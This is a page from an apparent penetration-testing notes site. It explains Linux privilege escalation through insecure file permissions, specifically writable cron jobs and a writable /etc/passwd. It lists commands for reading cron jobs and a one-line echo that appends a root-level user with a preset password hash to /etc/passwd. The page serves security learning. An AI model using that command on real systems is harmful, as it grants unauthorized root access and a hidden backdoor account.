Particle42
  • ๐Ÿ”ฌNetwork Enumeration
    • NMAP
    • TCPdump
  • ๐Ÿ”ญWebsite Enumeration
    • Passive Information Gathering
    • Subdomain Enumeration
  • ๐Ÿ–ฅ๏ธWeb Application
    • URL & App Scan
    • Subdomain/Vhost Fuzz
    • Login Hack
    • Cross Site Scripting
    • Directory Traversal
    • Local File Inclusion
    • Remote File Inclusion
    • PHP Wrappers
    • SQL Injection
      • Bypass Authentication
      • Database Enumeration
      • Code Execution Via Injection
      • SQL Injection Tools
      • Other Resources
    • NOSQL Injection
      • Bypass Authentication
    • WordPress Scanner
    • Hints & Easter Eggs
  • ๐ŸŽฃPhishing
    • Client Info Gathering
    • HTA
    • Word Macros
    • Windows Library Files
  • ๐ŸชŸWindows
    • Enumeration & PE Quick Ref
    • Enumeration
      • Users
      • Powershell History
      • System Details
      • Applications & Services
      • Files & Filesystems
      • Cached Creds
    • Windows PE
      • Windows PE Checklist
      • Service Binary Hijacking
      • Important Files
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Other PE Methods
      • Finding PE Vulns
      • SeImpersonatePrivilege
      • Bypassuac using Bypassuac.exe
      • Bypassuac using eventviewer.exe
      • Rasta Watson
    • Windows Remote Access
  • ๐Ÿ“‚Active Directory
    • About
    • Important Definitions
    • Exploitation Methodology
    • AD Kerberos
      • Invoke-Kerberoast - Shortcut
    • Domain Recon
      • Auto Recon
    • AD Authentication Attacks
      • Password Guessing
      • Creating & Cracking TGS
      • Kerberoasting
    • Lateral Movement
      • Pass the Hash
      • Overpass the Hash
      • Pass the Ticket
      • Distributed Component Object Model
      • Golden Ticket
      • Shadow Copy
      • Domain Controller Sync
      • Windows Management Instrumentation
      • PowerShell Remoting
    • All Commands, Tools & Scripts
      • Using Crackmapexec
      • Using Powerview
      • Important Scripts & Links
  • ๐ŸบBuffer Over Flow
    • Finding EIP Position
    • Eliminating Bad Characters
    • Finding Return Address
    • Payload for BOF
  • ๐ŸงLinux
    • Enumeration
      • Users
      • Encrypted Files
      • System Info
      • Files & Filesystems
      • Applications & Services
    • Attack Vectors
      • Authorised Keys
    • Linux PE
      • Enumeration Commands
      • Finding PE Vulns
      • Check Sudo List
      • Add User to Passwd File
      • SUIDs
      • Tasks with Wildcard
      • Dirty Cow
      • DirtyPipe
      • Insecure File Permissions
      • Enumerating Processes
    • Quick Commands
  • Services
    • SMB
      • Find Server Version
      • Directory Traversal using Symlink
      • Enable Passwordless SMB Access
    • MSSQL
    • MYSQL
    • PHPLiteAdmin
    • SSH
      • Limited Keys Issue
    • SMTP
      • Sending Email
    • Webdav
    • DNS
      • DNS Recon
  • โ†—๏ธPivoting
    • Bringing Internet Access
    • Port Forwarding
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
    • HTTP Tunnel-ing
    • DNS Tunneling
    • Chisel
    • Ligolo-NG
  • ๐Ÿ”‘Passwords
    • Wordlist Generation
    • HTTP Applications
    • OS Login
    • Password Cracking
      • Using Hashes Directly
      • Cracking Hashes
    • SAM & System
  • ๐Ÿ› ๏ธPractical Tools
    • Remote Shell
      • Alternate Reverse Shells
      • Move to Interactive Shell
    • File Transfers
      • Quick Webservers
    • CURL
    • Payloads
      • MSFVenom
      • Veil Framework
    • Crafty Executable
    • Metasploit
      • Discovery
    • IMPACKET
      • MSSQL-Client
    • Clever Alternatives
  • ๐Ÿš€Privilege Escalation
    • General Info
  • โšกResources
    • Exploits
Powered by GitBook
On this page
  • Crontab
  • Passwd File

Was this helpful?

  1. Linux
  2. Linux PE

Insecure File Permissions

PreviousDirtyPipeNextEnumerating Processes

Last updated 1 year ago

Was this helpful?

In this attack method, we identify an executable that allows other users write access and it runs at an elevated privilege.

Crontab

Crontab, scheduler in Linux, is a prime target as system level scheduled jobs are executed with root user privileges. System administrators also make the mistake of creating cron jobs with insecure permissions.

We can look for cron jobs in 2 different ways. First by looking into the filesystem for installed cron jobs. This can be done by using the following command,

cat /etc/crontab
grep "CRON" /var/log/cron.log

There are times when not all cron jobs get listed (I am still trying to figure it out). In the mean time I came across this script created by Benjamin W of Stackoverflow to list all cron jobs of all users. Here's the link to the script that I have added to my Github account,

Passwd File

The passwd file under the etc folder contains the list of users and it optionally stores the password hash of the user. When a user get authenticated the respective process checks the passwd file for the hash before moving on to the Shadow file, which contains the password hash.

If we were to have write access to this file, then we can manually add a user and password to this user. We can then login as that user with elevated privileges.

The hash to the password can be generated using the following command,

openssl passwd <password>

Then using the output of the previous command a new user similar to the root user can be added to the passwd file.

echo "root2:BK24fhifieu3I:0:0:root:/root:/bin/bash" >> /etc/passwd
๐Ÿง
vapt/completecrontac.sh at main ยท SisyphusP42/vaptGitHub
Logo